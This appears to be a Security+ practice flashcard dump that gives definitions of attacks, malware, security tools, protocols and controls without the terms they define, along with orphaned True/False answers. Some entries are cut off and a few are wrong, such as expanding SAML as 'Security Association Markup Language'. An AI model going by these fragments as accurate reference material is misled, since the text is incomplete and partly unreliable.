Comptia Certmaster Practice For Security+

A type of ransomware that encrypts the user's data. The user will be unable to access the files without obtaining the private encryption key, which is held by the attacker.

A function that is easy to compute in one direction, yet believed to be difficult to compute in the opposite direction (finding its inverse) without special information, called the "trapdoor." Widely used in cryptography.

is a type of Trojan malware that tries to extort money from the victim. It will display threatening messages, stating the computer will remain locked until the ransom is paid.

is a malicious program hidden within an innocuous-seeming piece of software. Usually, the Trojan tries to compromise the security of the target computer.

is a fake antivirus, where a web pop-up claims to have detected viruses on the computer and prompts the user to initiate a full scan, which installs the attacker's Trojan.

is a type of software or browser plug-in that is similar to spyware. If the user accepts the data use policy and the program generally behaves like any other commercial software installation, then it's not spyware.

True

True

False

is a social engineering technique to gain access to a building by following someone else (or persuading them to "hold the door").

is a program that monitors user activity and sends the information to someone else. This can occur with or without the user's knowledge.

is backdoor malware that changes core system files and programming interfaces, so that local shell processes, no longer reveal their presence.

is a set of computers that has been infected by a control program called a bot, that enables attackers to exploit the computers to mount attacks.

functions as backdoor, and allows the attacker to access the PC, upload files, and install software on it

Organized Crime

Using OSINT to gather info about a domain.

is the part of the discovery phase where the attacker or pen tester starts to identify the structure of the target network.

Determining which IP addresses in the network have live system. Techniques include ARP scans, passive listening, ICMP Sweeps, IPv6 neighbor discovery and many more.

is a hijacking attack that forces a user to unintentionally click a link that is embedded in or hidden by other web page elements.

is where the web browser is compromised by installing malicious plug-ins or scripts or intercepting API calls. Vulnerability exploit kits can be installed to a website and actively try to exploit vulnerabilities in clients browsing the site.

is a malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser.

occurs when the attacker would craft a malicious URL and convince the victim to submit it to the web server.

are data that is stored on a user's computer by websites that use Adobe Flash Player. A site may be able to track a user's browsing behavior through LSOs.

consists of intercepting a key or password hash, then reusing it to gain access to a resource, such as the pass-the-hash attack.

is a type of brute force attack aimed at exploiting collisions in hash functions. This type of attack can be used for the purpose of forging a digital signature.

is the practice of using a Wi-Fi sniffer to detect WLANs and then either making use of them or trying to break into them (using WEP and WPA cracking tools).

is an RFID attack where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card. previous

is a redirection attack, that aims to corrupt the records held by the DNS server itself. The intention is to redirect traffic for a legitimate domain to a malicious IP address.

occurs when an attacker, with access to the network, redirects an IP address to the MAC address of a computer that is not the intended recipient.

is a malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site.

refers to using an exploit in Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism.

an attacker fools users into believing that a malicious website is legitimate by posting fake reviews. The victims believe the reviews and place their trust in the website.

means the code performs the same function by using different methods. Refactoring means that the antivirus software may no longer identify the malware by its signature.

The code library to enable legacy mode

is a reference to an object in memory. Attempting to access that memory address is called dereferencing.

causes the target software to calculate a value that exceeds the upper and lower bounds.

a replay attack is used to make the AP generate lots of IV packets, usually by replaying ARP packets at it, and cycle through IV values quickly.

allows another VM to sniff the unicast packets addressed to a remote interface (like a spanned port on a hardware switch).

the adversary spoofs the victim's IP address and attempts to open connections with multiple servers. Those servers direct their SYN/ACK responses to the victim server. This rapidly consumes the victim's available bandwidth.

sends a stream of spoofed deauth frames to cause a client to deauthenticate from an AP. This might allow the attacker to interpose the rogue AP or sniff information about the authentication process.

hits the target with disassociation packets and is used to perform a Denial of Service (DoS) attack against the wireless infrastructure.

occurs when an attacker, with access to the network, redirects an IP address to the MAC address of an unintended computer.

is a type of spoofing attack where the attacker disconnects a host, then replaces it with his or her own machine, spoofing the original host's IP address.

is a directed social engineering attack. It relies on the circumstance that a group of targets may use an unsecure third party website.

an email alert or web pop-up will claim to have identified some sort of security problem, like a virus infection, and offer a tool to fix the problem, but the tool will be some sort of Trojan application.

relies on corrupting the way the victim's computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one.

occurs when the attacker gets access to a file outside the web server's root directory.

describes the problem of authorizing a request for a service that depends on an intermediate service

A wireless technology (near field communication) that lets your mobile device communicate over very short distances, such as when paying for goods on wireless payment devices. It does not provide encryption.

is a security mechanism that requires that each party in a communication verifies each other's identity and helps in avoiding Man-in-the-Middle attacks.

relies on users navigating to misspelled domains. An attacker registers a domain name with a misspelling of an existing domain. Users who misspell a URL in a web browser are taken to the attacker's website.

is a server-side input validation exploit that injects a script into a website. Once the victim visits the infected website, the malicious code executes in the user's browser.

is a server-side script attack that inserts code into a back-end database used by the trusted site.

exploits vulnerabilities in client-side scripts to modify the content and layout of a web page.

A technique that is based on how frequently certain letters appear in English versus others.

is a security control that allows only the user to see the screen contents, thus preventing shoulder surfing.

is a data center that contains racks with networking equipment owned by different companies.

is the act of continually registering, deleting, and reregistering a name within the five-day grace period without having to pay for it.

is a Domain Name Server (DNS) exploit that involves registering a domain temporarily to see how many hits it generates within the five-day grace period.

an exploit is used to gain access to the target's network. This might be accomplished using a phishing email and payload, or by obtaining credentials via social engineering.

true

1. Gaining physical access 2. Using scanning tools

Passive

is a system and/or set of privileges that allow the tester to compromise other network systems (lateral spread).

uses software tools to obtain information about a host or network topology, and is associated with the reconnaissance phase of a pen test.

is the social engineering tactic in which an attacker attempts to obtain sensitive information from a user by posing as a trustworthy figure through email communications.

Initial Exploitation phase

is code that will run on the target system, performing some kind of task or giving the attacker interactive control.

initial exploitation phase

is the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor.

Further reconnaissance

Initial exploitation

means carrying out the work as defined by the tester or client.

Data exfiltration

the consultant is given some information; this resembles the knowledge of junior or non-IT staff to model types of insider threats.

True

is the process of auditing a network (or application) for known vulnerabilities.

False

1. Phishing 2. Social Engineering Attack 3. Malicious payload

Reconnaissance

They are more likely to cause performance problems with the host.

1. Sniffing Network traffic to identify assets communicating on the network. 2. To identify ports used 3. discover some types of vulnerabilities.

involve making a connection to the target host. This might mean authenticating and establishing a session with the host or running an agent on a host.

Hardware security module. A removable or external device that can generate, store, and manage RSA keys used in asymmetric encryption. High-volume e-commerce sites use HSMs to increase the performance of SSL sessions. High-availability clusters needing encryption services can use clustered HSMs.

Trusted Platform Module. This is a hardware chip on the motherboard included on many newer laptops. A TPM includes a unique RSA asymmetric key, and it can generate and store other keys used for encryption, decryption, and authentication. TPM provides full disk encryption.

Identity and Access Management is a security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets.

True

1. The lack of processing power 2. The memory space available to run functions.

One way of increasing the security of data in transit for embedded systems. It usually includes a header, which precedes the encapsulated data, and a trailer, which follows it.

is a software vulnerability that can occur when a Windows-based application attempts to force another running application to load a dynamic-link library (DLL) in memory, that could cause the victim application to experience instability or leak sensitive information.

1. Their control systems use outdated operating systems. 2. They use unsecure communication protocols.

1. Error handling 2. Proper authentication and authorization 3. Input validation

allows a mobile device to share its cellular data or WiFi connection with other devices (tethering). A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities.

allows a port to function either as a host or as a device.

False

is a single point of failure that relies on a single hardware server or appliance or network channel.

is an email encryption standard that adds digital signatures and public key cryptography to email.

True

are a configuration setting for the intrusion detection system (IDS).

Content filtering, such as blocking URLs and applying keyword-sensitive blacklists or whitelists.

operates on the network layer. Common devices like a router operate at layer 3 to route traffic based on IP addresses.

A network device that makes decisions about where a packet is sent based on a MAC address or a logical name. Mostly describes a basic Ethernet switch.

a device that incorporates advanced encryption and authentication methods, to handle many VPN tunnels.

places information retrieved from the internet into a temporary storage area so that if the information is requested again by another client, it already has it. This reduces the number of calls to the internet and speeds up performance.

will cause network connections to drop, since the packet cannot make the appropriate hop to the next switch and to its final destination. They also generate broadcast storms.

When there is an accumulation of broadcast and multicast packet traffic on the LAN coming from one or more network interfaces.

Basic switches to allow traffic to flow freely. They normally don't have any advanced configurations.

uses a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident.

uses an engine that looks for irregularities in the use of protocols. For example, the engine may check packet headers or the exchange of packets in a session against RFC standards and generate an alert, if they deviate from strict RFC compliance.

learns from experience to detect differences from the baseline. This type of detection is the same as behavioral-based detection.

uses an engine to recognize baseline "normal" traffic or events. Any deviation from the baseline (outside a defined level of tolerance) generates an incident.

is used by IPsec to provide encrypted communication by encrypting the entire network packet. This method will be used mostly in unsecured networks.

is used by IPsec to provide encrypted communication by only encrypting the payload. This method will be used mostly in private networks.

refers to the cryptographic product that processes multiple blocks. ECB or Electronic Code Book is the simplest mode of this kind.

is a type of cipher mode of operation.

is that it will block connections that use weak cipher suites or implementations and block connections that cannot be inspected.

can be configured with filters for multiple protocol types, such as HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), and SMTP (Simple Mail Transfer Protocol).

will only filter out content from the web.

requires no extra configuration of client computers. This proxy intercepts client traffic through a switch, router or other inline network appliance.

requires a client to be configured with the proxy server address and port settings.

provides Enterprise services to clients from both virtual servers. All services will transparently transfer to the other server if one virtual host goes offline.

provides Enterprise services to clients from only one virtual server. The other server comes online only when the currently active server goes offline.

is used in load balancing scenarios. This is also known as source IP (internet protocol) and is a layer 4 approach to handling user sessions.

is used in load balancing scenarios. New client sessions are established with the next server in the group. Round robin and affinity provide stateless fault tolerance.

involves VPN client agents connecting to a VPN-enabled router concentrator at the company's main network. This is ideal for telecommuters. If used with TLS or SSL VPN, port 443 will be used.

will require a remote server listening on port 443 (so no changes to firewalls) and optionally, a set of client certificates for authenticating the device (transparent for users after simple set up).

A type of VPN in which VPN gateways at multiple sites encrypt and encapsulate data to exchange over a tunnel with other VPN gateways. Meanwhile, clients, servers, and other hosts on a site-to-site VPN communicate with the VPN gateway.

is a hardware security module that BitLocker uses to link an encrypted hard drive with a specific system.

true

is describe as a rod with fins. It is a directional antenna.

are plastic-coated rods used on wireless access points (WAPs).

Omnidirectional vertical rod-type antennas, which receive and send signal in all directions.

specifies a list of valid MAC addresses of devices that will be allowed to connect to the WAP (wireless access point).

service set identifier is used to help users identify the correct WAP they are connecting to. An extended SSID or ESSID is used when multiple SSIDs are grouped into one.

contains rules that define the type of data packet and the appropriate action to take when it exits or enters a network or system. The general actions are to either deny or accept.

scans for content in a structured format like an e-mail and performs an action based on policy. (e.g., blocks an e-mail containing proprietary information).

is network protocol that establishes an encrypted link between a web server and a browser. Users interact commonly with their bank's web portal using encrypted communication via an SSL or TLS connection.

is a means for the bridges to organize themselves into a hierarchy and prevent loops from forming.

is an advanced security feature that allows a certain amount of MAC addresses to access a physical port. After a certain number, new connections will be blocked.

is a feature of a circuit-level firewall that prevents maliciously open connections from forming. This is not applicable to switching loops.

False

1. Application layer gateway firewall 2. stateful multilayer inspection firewall 3. deep packet inspection firewall

supports a wide range of devices, such as smartphones and tablets, but less detailed information about the client is available.

is loaded into memory and never installed on the system. This option still requires an agent that may not be compatible with mobile devices.

connects two network segments together. An example includes a bridged connection between the wireless and Ethernet adapters of a laptop.

is created when wireless network adapters are configured to connect to one another in a peer-to-peer WLAN (Wireless LAN) topology.

True

is a type of proxy used to examine encrypted traffic before it enters or leaves the network. This ensures that traffic complies with data policies and strong cipher suites are used. It is positioned at the network's edge as a transparent bridge to evade a hacker's view. It will not be a regular device with an IP address on its own subnet range.

A DLP or SIEM to apply security policies and provide effective monitoring and reporting.

False

Common Address Redundancy Protocol

is Cisco's proprietary service to providing a load-balanced service with a VIP. GLBP and CARP are similar in functionality.

he edge of the network is also the point where internal network meets the public network. The placement makes the SSL decryptor a single point of failure.

is mainly used to increase the wireless range or its performance.

can be used to sign and encrypt email messages, typically using S/MIME (Secure/Multipurpose Internet Mail Extensions) or PGP (Pretty Good Privacy).

pings the specified server name or IP (Internet protocol) address until stopped. Typing CTL+C on the keyboard will stop the pings.

sets the number of echo requests to send. The standard send count is four. The number can be specified after the -n switch.

which is a capital S, is used to specify a source address to use that is different from the server that the admin is initiating the ping command from.

records route for count hops. This is used for IPv4 addresses.

True

stores domain user passwords and credentials.

is a suite of utilities designed for wireless network security testing. The specific tool, which is also called aircrack-ng, can decode the authentication pre-shared key or password for WEP, WPA, and WPA2 using a dictionary word or a relatively short key.

is a software that can survey Wi-Fi networks to determine SSID, BSSID (wireless access point MAC address), frequency band, and radio channel.

is a remote access trojan (RAT) that is available for both Windows and Linux. It can be configured as a backdoor.

is a protocol analyzer. It can parse the headers network protocols and list their contents and derive purpose. This can help pinpoint the dropped packets and on what network adapter, so further troubleshooting can take place.

is a suite of tools designed to assist with troubleshooting issues with Windows. Its Process Explorer can reveal all the processes and its details on the system. These tools are not useful for a networking issue.

is an exploit module that uses in-memory DLL injection stagers.

create a network connection between the hacker and the target. Since the stagers are in memory and never written to disk, any trace can be removed with a restart of the server.

is a vulnerability scanner. When integrated with Metasploit Pro, Metasploit can then read the scan report and confirm vulnerabilities to rule out false positives.

is a Debian-derived Linux distribution designed for system forensics and penetration testing.

is a vulnerability scanner from Tenable. A hacker may use a vulnerability scanner to seek out easy targets (e.g., open ports) to plan for an attack. previous

is a disk wiping sanitization software tool that can purge data on disk by overwriting data with 1s and 0s. Overwriting might also be performed in multiple passes. The disk can be recycled after using this software.

includes the Policy Analyzer Tool and the Local Group Policy Object (LGPO) Tool. Both are necessary to assess the local policies from a baseline and automate changes where needed.

is the preferred method in a Windows domain using a ticket granting system to login and access resources on the network.

True

New Technology LANMAN. Authentication protocol intended to improve LANMAN. The LANMAN protocol stores passwords using a hash of the password by first dividing the password into two seven-character blocks, and then converting all lowercase letters to uppercase. This makes LANMAN easy to crack. NTLM stores passwords in LANMAN format for backward compatibility, unless the passwords are greater than fifteen characters. NTLMv1 is older and has known vulnerabilities. NTLMv2 is newer and secure.

A Windows feature that encrypts an entire drive

is used to recover Windows passwords and includes a password sniffing utility.

Is a free password cracking software tool. It is compatible with multiple platforms. It's one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, auto detects password hash types, and includes a customizable cracker.

A password cracking tool which utilizes a dictionary attack method. It is often used against remote authentication using protocols such as Telnet, FTP (file transfer protocol), HTTPS (hypertext transfer protocol secure), SMB (server message protocol), etc.

is the GUI (Graphical User Interface) version for Nmap. Also known as Nmap Security Scanner, it uses diverse methods of host discovery

is like banner grabbing or OS fingerprinting. The OUI can identify the manufacturer of the network adapter and therefore, conclude other assumptions related to system type and/or purpose.

is a method used by Nmap to probe hosts for running OS type and version, and even application names and device type (e.g., laptop or virtual machine).

is a technique used in cryptographic systems

involves enabling and testing power delivery systems such as a power grid, generators, and even UPSs (uninterruptible power supplies). Without power, IT systems and network equipment cannot run.

to enable and test network security appliances, like a firewall. The cloud service must enter the network to restore data.

to enable client workstations, devices, and even client browser access.

The sequence in which different systems are reinstated.

is given a user account with logon rights to various hosts. This method allows much more in-depth analysis, especially in detecting when applications or security settings may be misconfigured.

refers to probing a server like OS fingerprinting; however, it also involves opening random connections to common port or network protocols and gathering information from banner or error responses.

is part of the Security Compliance Toolkit (SCT). It compares scanned hosts with a template of controls and configuration settings to determine system compliance.

is a software management suite to manage a large amount of systems on multiple platforms. It does not include a policy analyzer tool and a LGPO tool.

involves a three-phase pass of writing 1s, 0s, and random characters onto a hard drive. This method will prevent the use of many software-based file recovery methods

is a method of erasing data on a hard drive with a powerful magnet. This process also renders the drive unusable because of permanent damage to the device's servo control data that is required to read and write.

Relationship between subordinate certificate authorities

Mean time to failure. The length of time you can expect a device to remain in operation before it fails. It is similar to MTBF, but the primary difference is that the MTBF metric indicates you can repair the device after it fails. The MTTF metric indicates that you will not be able to repair a device after it fails.

is a measure of the time taken to correct a fault so that the system is restored to full operation. Neither MTTF or MTBF can do this.

True

Serial Advanced Technology Attachment; interface that uses serial signals to transfer data, instructions, and information.

Serial ATA-based connector for external hard drives and optical drives.

is a zip file that provides additional features or integration capabilities with other devices, like NetApp storage.

Symantec Endpoint Protection is the commonly known anti-virus software that should be on every client image.

It is part of Window's Sysinternals suite of tools. In addition to listing the running programs, Process Explorer can list the files and directories each process has open, as well as open handles and loaded DLLs.

is a Windows tool used to manually verify operating system (OS) files.

which is part of Windows Sysinternals, can help with hunting down malware on a computer.

is a central repository for updates related to OS and applications like Microsoft Office. Once downloaded locally, WSUS distributes the updates to the client computers.

is personal data that is segmented from organizational data on a mobile device. It gives IT administrators control over corporate assets on employees' mobile devices.

modifies the firmware of the radio modem used for cellular, Wi-Fi, Bluetooth, NFC, and GPS connectivity.

gives users the ability to obtain root privileges, sideload apps, change or add carriers and customize the interface. It is accomplished by booting the device with a patched kernel and can be done when the device is attached to a computer when it boots.

finds a device's location by triangulating its proximity to other radio sources, such as Wi-Fi access points or Bluetooth beacons.

is the process of adding geographical identification metadata, such as the latitude and longitude of where the device was located at the time, to media, such as photographs, SMS messages, video, and so on.

occurs when a device can be put into discoverable mode, meaning that it will connect to any other Bluetooth devices nearby, which can pose a security issue.

Personal Area Networks

is widely used in communicating health and fitness sensor data between devices. ANT+ is its associated product standard.

True

negotiates an Secure Sockets Layer/Transport Layer Security (SSl/TLS) tunnel before the exchange of any File Transfer Protocol (FTP) commands.

uses the AUTH TLS command to upgrade an unsecure connection.

encrypted the authentication and data transfer between the client and server and a secure link is created between the client and server using SSH.

is a connectionless protocol that provides file transfer services. It does not provide the guaranteed delivery offered by FTP.

provides an automatic method for network address allocation. As well, an IP address and subnet mask can include optional parameters.

performs a cryptographic hash on the packet plus a shared secret key (known only to the communicating hosts), and adds this HMAC (Hashed Message Authentication Code) in its header as an Integrity Check Value (ICV).

is more reliable than RADIUS. It uses TCP communications over port 49 and this reliable, connection-oriented delivery makes it easier to detect when a server is down. All of the data in TACACS+ packets is encrypted.

is a network service that stores identity information in a particular network, including users, groups, servers, client computers, and printers.

would obtain the time from a stratum-1 server. Time must always be received from a higher level server.

supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions.

uses community names that are sent in plaintext and should not be transmitted over the network, if there is any risk they could be intercepted. This protocol does not support encryption.

also uses community names that are sent in plaintext and should not be transmitted over the network, if there is any risk they could be intercepted. Like SNMPv1, this protocol does not support encryption

is the database that the agent within SNMP utilizes. The agent is a process that runs on a switch, router, server or other SNMP compatible network device.

Time synchronization

are governed by international standards and are to be implemented globally versus nationally

regulates the cybersecurity risks and activities in the United States. It is part of the U.S. Department of Commerce and considered a national framework.

are based on specific laws and regulations and ensure compliance of those standards. Medical records are governed by regulatory laws.

are governed according to the type of product provided. Financial information (i.e. credit card, bank account) is covered under industry-specific standards.

includes the use of multiple control types such administrative, technical and physical. This can include security guards (physical), IDS or Intrusion Detection System (technical), and penetration testing (administrative).

is a device used to generate, maintain and store cryptographic keys.

is the use of multiple vendors. This method increases security by adding several layers and also provides defense in depth to the network.

uses a combination of control types for control diversity.

is designed to offload tasks from servers allowing network load to be distributed. It can provide a seamless service to consumers of network applications, while balancing out session requests.

provides protection from malicious threats over secure connections and would be placed in the Demilitarized Zone (DMZ).

can connect multiple subnets to reduce the number of active ports. When aggregating subnets, the subnets are connected to the switch.

is used to extend a wired local area network through the use of an antenna.

is created when two or more wireless devices connect to one another creating an on-demand network. This network architecture does not require an AP.

allow the network administrator to divide the network into different network segments known as zones

combines multiple sensors to collect internet traffic for processing by an Intrusion Detection Systems (IDS) and other systems. Depending on its placement determines the type of traffic analyzed.

is part of a Security Information and Event Manager (SIEM). It captures and examines logged events to alert administrators of potential threats on a network.

provide increased system availability and fault tolerance for disks.

provides for high availability for servers and can remove the single point of failure. Clustering is similar to load balancing, but is more costly than RAID implementations.

is a zone created to allow authorized users access to company assets separate from the intranet.

is an internal company zone established to allow employees the ability to share content and communicate more effectively.

is a part of security as a service, and monitors network traffic between a company's network and cloud provider, enforcing security policies.

administrators decide where traffic is routed. It can decipher whether traffic goes to a private network or not.

is the act of separating system services to protect applications from other parts of the system.

would physically isolate a system and its resources from other systems.

are predefined security rules created in a SIEM that alert an administrator of malicious or suspicious events once triggered.

refers to the collection of data logs from multiple security devices.

uses multiple IP addresses to map one private IP to many public IP's, disguising them from the internet. It chooses which IP to use based on the load presented.

is radio frequencies emitted by external sources, such as power lines and lights that disturb data signals.

can protect from data loss and interference. Electromagnetic Interference (EMI) can also be avoided through this method.

includes both the hardware and software to encrypt data on a drive. Keys are securely stored within for decryption.

examines incoming and outgoing email traffic. It can be configured to inspect email traffic for certain terms and force encryption based on policies. It can also deny email traffic that it views as vulnerable.

employs the principle of deploying systems with only the services and protocols required to perform the job.

is a baseline for the system. This image includes the final product of software and security services running on a system.

refers to security measures that are implemented as a way to provide protection for computer systems.

is the practice of removing default values to ensure the system is more secure.

is an implementation of MAC that focuses on confidentiality. It is able to enforce the separation of multiple classifications of information.

is a known secure starting point by embedding a private key in the system. The key remains private until the public key is matched.

is a process that validates system files during the startup process to ensure they have not been modified.

is the process of checking and validating system files during a boot process.

is a specification for a software program that connects a computer's firmware to its operating system. It is the replacement for BIOS (Basic Input/Output System) and has many advancements to include provisions for secure booting.

False

is an isolated environment that is often used for testing. Security, patches, and critical updates can be tested there also without touching the system before implementation.

mimics that of production and allows for an environment to practice deployment. In the event deployment fails in this environment, it can roll back to the test and development environments.

is the final stage of the deployment effort. Testing in this environment would be too late, given it is the operational environment.

is a place for creation. Requirements are turned into reality in this environment. It is not a complete copy of production, but just the beginning of an application.

catch errors in action to avoid system failure. It is a secure coding method during the development process.

is the process of improving existing code without changing its behavior and adding new requirements.

is a microchip that contains all necessary parts a computer needs to operate by itself. Examples include smartphones, tablets, and smartwatches. Data loss has become a primary security concern for theses systems.

is an Industrial Control System (ICS) that is used to control infrastructure processes, facility-based processes, or industrial processes.

is the process of managing data centers through automated means.

verifies application code has not been modified by the use of digital signatures. The certificate provided with the signature identifies the author of the application and the code's authenticity. It is a secure coding practice.

verifies data is valid. It uses a set of rules to validate entries in fields for proper use. In the event an entry is invalid, the application will reject the entry.

is the process of controlling and coordinating computer memory to maximize system performance. Poor memory management techniques can result in overflow issues.

is a set of Structured Query Language (SQL) statements stored in a database as a group, so it can be reused and shared by multiple programs. They can validate input.

is the process of ensuring software meets its intended purpose and specifications.

contains information about sessions between network hosts. This type of data is gathered by a stateful firewall.

examines code quality and effectiveness without executing the code. It can be used in conjunction with development, for continued code quality checks or once the code is in its finalization stages.

attempts to simulate a production environment and focuses on the objective and threshold loads an application can handle while maintaining performance.

analyzes a running application to determine if changes have adversely affected the system.

is used to optimize database performance by removing duplicates, use of primary keys, and related data contained in separate tables.

verifies data is valid upon entry to the system.

occur on the web server or back-end and take more time to complete. It is more secure than client side validation.

inspects code as it is running for code quality and vulnerabilities. Fuzzing is a common technique used.

is a dynamic analysis technique that checks code as it is running. When using this technique, the system is attacked with random data to check for code vulnerabilities.

allows for the merging of code changes into a central repository. The code is built and tested each time it is checked into the environment, providing a more efficient method to code production.

is the process of procuring, configuring and making available an application or system on certain services. Performing this on an application allows it to run on its intended platform.

is the act of removing or disabling access to a resource. Since the application has been replaced, the application should be deprovisioned to preserve resources.

maintains a top to bottom approach. When one stakeholder has finished a piece of work, the other can then begin. This approach ensures each phase of development is completed before another can proceed.

software development focuses on cross-functional teams working together throughout the life cycle of a project. This development encourages continued interaction between each stakeholder to produce continued deliverables at a quick pace.

is an agile-like process that continually focuses on security. It also demands continuous interaction between stakeholders, but keeps security as a focus throughout the development.

occurs when a compiler is necessary to make the files executable. The compiler checks the code for errors, and if an error is found, it will not allow the code to execute.

is the process of collecting technical, functional and system necessities for a system.

is an agile approach that focuses on the growth of products with continual delivery while not overburdening the development team.

combines the words development and operations. It is an agile-aligned model that includes security throughout its process.

is the ability to create a secure image and test it in a controlled DevOps environment.

is defined as computing services offered either over the Internet or within a private internal network. Only certain authorized users can access a private cloud infrastructure.

exists on the premises of the cloud provider. A service provider makes resources available to the general public over the internet

is an environment that uses a mix of public, community and private cloud concepts with a single management platform.

is a collaborative effort in which infrastructure is shared between several organizations that share a common interest.

is a part of the Software as a Service (SaaS) platform. It handles and manages security practices for a customer. Any security services provided in the cloud are a subset of SaaS cloud-based technologies.

False

are virtualization solutions that run directly on system hardware. They do not require operating system involvement in order to run.

are virtualization solutions that run as software and do require a host operating system.

refers to an unauthorized user taking control of a host machine through a VM. The attacker can take administrative control of the host and subsequently, the virtual machines connected.

is a phenomenon that occurs when the number of VM's on a network reaches a point where the administrator can no longer manage them effectively.

provides that multiple nodes are configured to work together on complex problems. A central processor divides the task into smaller pieces and coordinates tasking the nodes. If a single node fails, processing continues for a high availability solution.

use multiple servers to maintain high availability for a server. One configuration remains active, while the other remains inactive. If the active node fails, the inactive one takes over the load.

is the capacity to increase the workload on current resources.

is a product of redundancy and allows that, in the event of a crash, the system will maintain operations by removing the single point of failure. The system will continue to operate without notice.

can help keep systems in a secure state. It can continuously check configurations of a system and react accordingly to keep systems secure and available.

would be a process of evaluating what access users need to perform their jobs; this would not include implementation of policy.

is more relevant to the closure of accounts and revocation of credentials than in the creation of a new account.

describes the relationship between parent and child domains. The child (in this case, IronCorp) trusts the parent (SteelCorp), but the parent does not trust the child.

match how the user applies their signature, analyzing aspects such as stroke, speed, and pressure, making it more difficult to spoof than a simple forgery.

is not an identity provider; it is an open standard that allows identity providers (IdP) to pass authorization to service providers (SP). Shibboleth is both an IdP and an SP.

the most specific attribute goes first, and definitions become broader further down the list. This option begins with the broadest definition.

identifies a resource by attribute=value pairs, separated by commas. The attributes are listed in order from most specific to broadest term.

The handshake is repeated with different challenge messages periodically throughout the session connection

Common Name (CN), Organizational Unit (OU), Organization (O), Country (C), Domain Component (DC)

TACACS+ is similar to RADIUS, but Cisco designed it with flexibility in mind. Its connection-oriented delivery method increases reliability and flexibility. It is supported by third parties and open-source RADIUS implementations. All data in TACACS+ packets is encrypted (not just authentication data).

in an X.500 directory, or similar directory, this identifies a resource by attribute=value pairs, separated by commas. The attributes are listed in order from most specific to broadest term.

SAML tokens are signed with an eXtensible Markup Language (XML) digital signature

are examples of user-centric identity management protocols, whereas SAML implementations are controlled by the system, or enterprise controlled. These use JavaScript Object Notation (JSON) and JSON Web Tokens (JWT) rather than eXtensible Markup Language (XML).

True

TACACS+ is able to operate Authentication, Authorization, and Accounting (AAA) functions separately, which gives it greater flexibility for device management, whereas RADIUS is used more for user network remote access.

The server does not require client authentication

True

OAuth provides authorization services only, while OpenID Connect (OIDC) provides federated authentication

True

One of Shibboleth's main components, the Embedded Discovery Service, allows the user to choose a preferred identity provider. The user does not choose the identity provider in Security Association Markup Language (SAML).

Time stamp, name and IP address

Kerberos and Microsoft Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2)

is the ideal choice for assigning complex rule-based privileges. It makes access decisions based on subject and object attributes, as well as context-dependent and system-wide attributes, making it the most fine-tuned control.

A biometric template

False

Pattern matching from templates Biometric template storage and security

True

False

OUs divide a domain into different administrative realms

Using administrative accounts for mundane tasks

It is best practice to use the default administrator accounts only to install the operating system (OS). Then they should be disabled. This makes it harder for attackers to find and compromise an admin account.

True

General account prohibition makes it harder to identify and compromise an administrative account

is an onboarding process that involves identifying the roles and permissions users need. It is often a visual representation of an organization, organized by permissions and account types.

The security method of allowing privileges to a user only when needed and revoking them as soon as the task is complete.

"Accounts go into Global groups, which go into Domain Local groups, which get Permissions" (AGDLP)

System

Domain local groups

is a contractual agreement setting out detailed terms (including support metrics) for future provided services.

is used when any federal agency interconnecting its IT system to a third-party.

are actions outlined and classified in a policy as a violation. Common ones that are part of a fair use policy are the use of equipment to defraud, defame, or to obtain illegal material. Prohibiting the use of cameras or video is also common.

are actions intended to cause harm. Damaging company property, security breaches, and data theft are examples.

is the action of taking advantage of a weakness

is a formal agreement, or contract, that contains specific obligations rather than a broad understanding.

is an initial audit to determine whether a computer system or workflow collects, stores, or processes PII to the degree where a PIA must be performed.

is performed to identify vulnerabilities that may lead to data breach when storing, processing, and disclosing Personally Identifiable Information (PII). It also evaluates controls mitigating those risks.

is a formal document listing PII maintained by a federal agency of the US government.

Preparation Detection & Analysis Containment, Eradication, & Recovery Post-Incident Activity

staff will "ghost" the same procedures as they would in a disaster, without actually creating disaster conditions or applying or changing anything.

True

happens when additional senior staff become involved in the management of an incident.

serves as a guideline for determining what types of storage is more or less volatile than the other. Central processing unit (CPU) registers are extremely volatile. An Address Resolution Protocol (ARP) cache contains network addresses, and is highly volatile.

True

ARP cache

False

are copies of entire computer systems or data.

is a data backup/cloning technique, and is used in forensics.

True

refer to information that may be relevant to a court case that must be preserved. This may include data or entire computer systems.

is focused on ensuring evidence remains credible.

preservation of evidence practice.

Volume Shadow Copy Service (VSS)

True

indicates data is mirrored from a primary site to a secondary site.

Administrative control

describes the sociopolitical outlook of a nation concerning computing technology and information. Some nations may respect data privacy more or less than others. Care needs to be considered when storing such data.

is implemented in operating systems, software, and security appliances. Examples include Access Control Lists (ACL) and Intrusion Prevention Systems (IPS). An ACL is used to provide access to a system resource.

are used to determine behavior through policies, procedures, and guidance.

does not prevent an attack, but can restore functionality of systems through other means, such as a backup.

responds to and fixes an incident. It may also prevent reoccurrence. An example is antivirus software.

may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion. A warning sign is an example.

may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A security camera system is an example.

has the ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. They are also responsible for labeling the asset (such as determining who should have access and determining the asset's criticality and sensitivity).

is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata, and that data is collected and stored in a format that complies with regulations.

is responsible for managing the system where the data assets are stored. This includes responsibility for enforcing access control, encryption, along with backup and recovery measures.

is responsible for ensuring the upkeep of the technical systems that provide functionality for the business.

takes shredding one step further. Once data (such as documents) are subjected to shredding, the remains can be mixed with water (for example) for further destruction. Note that in this case, data is mentioned and not a storage disk which would likely use another method.

refer to sets of data. Since

is when data is present in volatile memory, such as system RAM or CPU cache.

state means that the data is in some sort of persistent storage media. Examples of data include archived audiovisual media.

is when data is transmitted over a network. The data can be sent over the WAN to its final location through a virtual private network (VPN).

